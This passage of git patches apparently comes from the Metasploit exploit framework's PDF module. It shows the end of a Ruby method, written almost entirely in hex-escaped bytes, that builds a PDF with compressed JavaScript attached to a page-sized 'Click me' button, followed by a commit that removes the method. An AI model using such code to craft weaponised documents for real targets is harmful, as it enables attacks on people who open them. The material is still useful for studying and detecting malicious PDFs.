8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe
6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") + add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") + add_object(51, 
"\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + + js = Zlib::Deflate.deflate(js) + add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d") + + add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") + add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") + add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(19, 
"\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") + add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(39, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2d\x42\x6f\x6c\x64\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x42\x6f\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(47, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x48\x65\x6c\x76\x65\x74\x69\x63\x61\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x2f\x48\x65\x6c\x76\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(48, "\xd\x3c\x3c\x2f\x42\x61\x73\x65\x46\x6f\x6e\x74\x2f\x5a\x61\x70\x66\x44\x69\x6e\x67\x62\x61\x74\x73\x2f\x4e\x61\x6d\x65\x2f\x5a\x61\x44\x62\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x54\x79\x70\x65\x31\x2f\x54\x79\x70\x65\x2f\x46\x6f\x6e\x74\x3e\x3e\xd") + add_object(45, 
"\xd\x3c\x3c\x2f\x44\x69\x66\x66\x65\x72\x65\x6e\x63\x65\x73\x5b\x32\x34\x2f\x62\x72\x65\x76\x65\x2f\x63\x61\x72\x6f\x6e\x2f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x64\x6f\x74\x61\x63\x63\x65\x6e\x74\x2f\x68\x75\x6e\x67\x61\x72\x75\x6d\x6c\x61\x75\x74\x2f\x6f\x67\x6f\x6e\x65\x6b\x2f\x72\x69\x6e\x67\x2f\x74\x69\x6c\x64\x65\x20\x33\x39\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x65\x20\x39\x36\x2f\x67\x72\x61\x76\x65\x20\x31\x32\x38\x2f\x62\x75\x6c\x6c\x65\x74\x2f\x64\x61\x67\x67\x65\x72\x2f\x64\x61\x67\x67\x65\x72\x64\x62\x6c\x2f\x65\x6c\x6c\x69\x70\x73\x69\x73\x2f\x65\x6d\x64\x61\x73\x68\x2f\x65\x6e\x64\x61\x73\x68\x2f\x66\x6c\x6f\x72\x69\x6e\x2f\x66\x72\x61\x63\x74\x69\x6f\x6e\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x6c\x65\x66\x74\x2f\x67\x75\x69\x6c\x73\x69\x6e\x67\x6c\x72\x69\x67\x68\x74\x2f\x6d\x69\x6e\x75\x73\x2f\x70\x65\x72\x74\x68\x6f\x75\x73\x61\x6e\x64\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x62\x61\x73\x65\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x64\x62\x6c\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x6c\x65\x66\x74\x2f\x71\x75\x6f\x74\x65\x72\x69\x67\x68\x74\x2f\x71\x75\x6f\x74\x65\x73\x69\x6e\x67\x6c\x62\x61\x73\x65\x2f\x74\x72\x61\x64\x65\x6d\x61\x72\x6b\x2f\x66\x69\x2f\x66\x6c\x2f\x4c\x73\x6c\x61\x73\x68\x2f\x4f\x45\x2f\x53\x63\x61\x72\x6f\x6e\x2f\x59\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x5a\x63\x61\x72\x6f\x6e\x2f\x64\x6f\x74\x6c\x65\x73\x73\x69\x2f\x6c\x73\x6c\x61\x73\x68\x2f\x6f\x65\x2f\x73\x63\x61\x72\x6f\x6e\x2f\x7a\x63\x61\x72\x6f\x6e\x20\x31\x36\x30\x2f\x45\x75\x72\x6f\x20\x31\x36\x34\x2f\x63\x75\x72\x72\x65\x6e\x63\x79\x20\x31\x36\x36\x2f\x62\x72\x6f\x6b\x65\x6e\x62\x61\x72\x20\x31\x36\x38\x2f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x63\x6f\x70\x79\x72\x69\x67\x68\x74\x2f\x6f\x72\x64\x66\x65\x6d\x69\x6e\x69\x6e\x65\x20\x31\x37\x32\x2f\x6c\x6f\x67\x69\x63\x61\x6c\x6e\x6f\x74\x2f\x2e\x6e\x6f\x74\x64\x65\x66\x2f\x72\x65\x67\x69\x73\x74\x65\x72\x65\x64\x2f\x6d\x61\x63\x72\x6f\x6e\x2f\x64\x65\x67\x72\x65\x65\x2f\x70
\x6c\x75\x73\x6d\x69\x6e\x75\x73\x2f\x74\x77\x6f\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x74\x68\x72\x65\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x61\x63\x75\x74\x65\x2f\x6d\x75\x20\x31\x38\x33\x2f\x70\x65\x72\x69\x6f\x64\x63\x65\x6e\x74\x65\x72\x65\x64\x2f\x63\x65\x64\x69\x6c\x6c\x61\x2f\x6f\x6e\x65\x73\x75\x70\x65\x72\x69\x6f\x72\x2f\x6f\x72\x64\x6d\x61\x73\x63\x75\x6c\x69\x6e\x65\x20\x31\x38\x38\x2f\x6f\x6e\x65\x71\x75\x61\x72\x74\x65\x72\x2f\x6f\x6e\x65\x68\x61\x6c\x66\x2f\x74\x68\x72\x65\x65\x71\x75\x61\x72\x74\x65\x72\x73\x20\x31\x39\x32\x2f\x41\x67\x72\x61\x76\x65\x2f\x41\x61\x63\x75\x74\x65\x2f\x41\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x41\x74\x69\x6c\x64\x65\x2f\x41\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x41\x72\x69\x6e\x67\x2f\x41\x45\x2f\x43\x63\x65\x64\x69\x6c\x6c\x61\x2f\x45\x67\x72\x61\x76\x65\x2f\x45\x61\x63\x75\x74\x65\x2f\x45\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x45\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x49\x67\x72\x61\x76\x65\x2f\x49\x61\x63\x75\x74\x65\x2f\x49\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x49\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x45\x74\x68\x2f\x4e\x74\x69\x6c\x64\x65\x2f\x4f\x67\x72\x61\x76\x65\x2f\x4f\x61\x63\x75\x74\x65\x2f\x4f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x4f\x74\x69\x6c\x64\x65\x2f\x4f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x6d\x75\x6c\x74\x69\x70\x6c\x79\x2f\x4f\x73\x6c\x61\x73\x68\x2f\x55\x67\x72\x61\x76\x65\x2f\x55\x61\x63\x75\x74\x65\x2f\x55\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x55\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x59\x61\x63\x75\x74\x65\x2f\x54\x68\x6f\x72\x6e\x2f\x67\x65\x72\x6d\x61\x6e\x64\x62\x6c\x73\x2f\x61\x67\x72\x61\x76\x65\x2f\x61\x61\x63\x75\x74\x65\x2f\x61\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x61\x74\x69\x6c\x64\x65\x2f\x61\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x61\x72\x69\x6e\x67\x2f\x61\x65\x2f\x63\x63\x65\x64\x69\x6c\x6c\x61\x2f\x65\x67\x72\x61\x76\x65\x2f\x65\x61\x63\x75\x74\x65\x2f\x65\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x65\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x69\x67\x72
\x61\x76\x65\x2f\x69\x61\x63\x75\x74\x65\x2f\x69\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x69\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x65\x74\x68\x2f\x6e\x74\x69\x6c\x64\x65\x2f\x6f\x67\x72\x61\x76\x65\x2f\x6f\x61\x63\x75\x74\x65\x2f\x6f\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x6f\x74\x69\x6c\x64\x65\x2f\x6f\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x64\x69\x76\x69\x64\x65\x2f\x6f\x73\x6c\x61\x73\x68\x2f\x75\x67\x72\x61\x76\x65\x2f\x75\x61\x63\x75\x74\x65\x2f\x75\x63\x69\x72\x63\x75\x6d\x66\x6c\x65\x78\x2f\x75\x64\x69\x65\x72\x65\x73\x69\x73\x2f\x79\x61\x63\x75\x74\x65\x2f\x74\x68\x6f\x72\x6e\x2f\x79\x64\x69\x65\x72\x65\x73\x69\x73\x5d\x2f\x54\x79\x70\x65\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3e\x3e\xd")
+ add_object(23, "\xd\x3c\x3c\x2f\x43\x72\x65\x61\x74\x69\x6f\x6e\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x33\x33\x35\x35\x31\x2b\x30\x32\x27\x30\x30\x27\x29\x2f\x43\x72\x65\x61\x74\x6f\x72\x28\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x29\x2f\x4d\x6f\x64\x44\x61\x74\x65\x28\x44\x3a\x32\x30\x31\x34\x30\x35\x33\x31\x31\x32\x31\x34\x32\x36\x2d\x30\x35\x27\x30\x30\x27\x29\x2f\x50\x72\x6f\x64\x75\x63\x65\x72\x28\x41\x63\x72\x6f\x62\x61\x74\x20\x57\x65\x62\x20\x43\x61\x70\x74\x75\x72\x65\x20\x31\x31\x2e\x30\x29\x2f\x54\x69\x74\x6c\x65\x28\x6a\x73\x2e\x74\x78\x74\x29\x3e\x3e\xd")
+
+ @xref_offset = @pdf.length
+ @pdf << xref_table << trailer(25, eol) << startxref
+
+ @pdf
+ end
+
+end
From 09e965d54e238a4b739a37727c2960e773569b98 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Sat, 31 May 2014 16:12:59 -0500
Subject: [PATCH 459/853] Remove extraneous method from pdf.rb
---
lib/msf/core/exploit/pdf.rb | 56 -------------------------------------
1 file changed, 56 deletions(-)
diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb
index 9412ad4b67..19b9a9204a 100644
--- a/lib/msf/core/exploit/pdf.rb
+++ b/lib/msf/core/exploit/pdf.rb
@@ -340,61 +340,5 @@ module Exploit::PDF finish_pdf end - ## - #Create PDF with a button onclick - ## - def pdf_with_button_js(js) - @xref = {} - @pdf = header('1.6') - - add_object(25, "\xd\x3c\x3c\x2f\x41\x63\x72\x6f\x46\x6f\x72\x6d\x20\x34\x30\x20\x30\x20\x52\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x20\x33\x20\x30\x20\x52\x2f\x4e\x61\x6d\x65\x73\x20\x33\x32\x20\x30\x20\x52\x2f\x4f\x75\x74\x6c\x69\x6e\x65\x73\x20\x37\x20\x30\x20\x52\x2f\x50\x61\x67\x65\x73\x20\x31\x36\x20\x30\x20\x52\x2f\x53\x70\x69\x64\x65\x72\x49\x6e\x66\x6f\x20\x32\x32\x20\x30\x20\x52\x2f\x53\x74\x72\x75\x63\x74\x54\x72\x65\x65\x52\x6f\x6f\x74\x20\x31\x30\x20\x30\x20\x52\x2f\x54\x79\x70\x65\x2f\x43\x61\x74\x61\x6c\x6f\x67\x3e\x3e\xd") - add_object(40, "\xd\x3c\x3c\x2f\x44\x41\x28\x2f\x48\x65\x6c\x76\x20\x30\x20\x54\x66\x20\x30\x20\x67\x20\x29\x2f\x44\x52\x3c\x3c\x2f\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3c\x3c\x2f\x50\x44\x46\x44\x6f\x63\x45\x6e\x63\x6f\x64\x69\x6e\x67\x20\x34\x35\x20\x30\x20\x52\x3e\x3e\x2f\x46\x6f\x6e\x74\x3c\x3c\x2f\x48\x65\x42\x6f\x20\x33\x39\x20\x30\x20\x52\x2f\x48\x65\x6c\x76\x20\x34\x37\x20\x30\x20\x52\x2f\x5a\x61\x44\x62\x20\x34\x38\x20\x30\x20\x52\x3e\x3e\x3e\x3e\x2f\x46\x69\x65\x6c\x64\x73\x5b\x33\x38\x20\x30\x20\x52\x5d\x3e\x3e\xd") - add_object(3, 
"\xd\x3c\x3c\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x33\x31\x33\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x58\x4d\x4c\x2f\x54\x79\x70\x65\x2f\x4d\x65\x74\x61\x64\x61\x74\x61\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x3c\x3f\x78\x70\x61\x63\x6b\x65\x74\x20\x62\x65\x67\x69\x6e\x3d\x22\xef\xbb\xbf\x22\x20\x69\x64\x3d\x22\x57\x35\x4d\x30\x4d\x70\x43\x65\x68\x69\x48\x7a\x72\x65\x53\x7a\x4e\x54\x63\x7a\x6b\x63\x39\x64\x22\x3f\x3e\xd\x3c\x78\x3a\x78\x6d\x70\x6d\x65\x74\x61\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x3d\x22\x61\x64\x6f\x62\x65\x3a\x6e\x73\x3a\x6d\x65\x74\x61\x2f\x22\x20\x78\x3a\x78\x6d\x70\x74\x6b\x3d\x22\x41\x64\x6f\x62\x65\x20\x58\x4d\x50\x20\x43\x6f\x72\x65\x20\x35\x2e\x34\x2d\x63\x30\x30\x35\x20\x37\x38\x2e\x31\x34\x37\x33\x32\x36\x2c\x20\x32\x30\x31\x32\x2f\x30\x38\x2f\x32\x33\x2d\x31\x33\x3a\x30\x33\x3a\x30\x33\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3e\xd\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x78\x6d\x70\x4d\x4d\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x78\x61\x70\x2f\x31\x2e\x30\x2f\x6d\x6d\x2f\x22\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x6e
\x73\x3a\x70\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x73\x2e\x61\x64\x6f\x62\x65\x2e\x63\x6f\x6d\x2f\x70\x64\x66\x2f\x31\x2e\x33\x2f\x22\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x6f\x64\x69\x66\x79\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x33\x2d\x33\x31\x54\x31\x33\x3a\x33\x35\x3a\x35\x31\x2b\x30\x32\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x65\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\x32\x30\x31\x34\x2d\x30\x35\x2d\x33\x31\x54\x31\x32\x3a\x31\x34\x3a\x32\x36\x2d\x30\x35\x3a\x30\x30\x3c\x2f\x78\x6d\x70\x3a\x4d\x65\x74\x61\x64\x61\x74\x61\x44\x61\x74\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\x41\x64\x6f\x62\x65\x20\x41\x63\x72\x6f\x62\x61\x74\x20\x31\x31\x2e\x30\x3c\x2f\x78\x6d\x70\x3a\x43\x72\x65\x61\x74\x6f\x72\x54\x6f\x6f\x6c\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x70\x64\x66\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x6c\x69\x20\x78\x6d\x6c\x3a\x6c\x61\x6e\x67\x3d\x22\x78\x2d\x64\x65\x66\x61\x75\x6c\x74\x22\x3e\x6a\x73\x2e\x74\x78\x74\x3c\x2f\x72\x64\x66\x3a\x6c\x69\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x41\x6c\x74\x3e\xd\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x
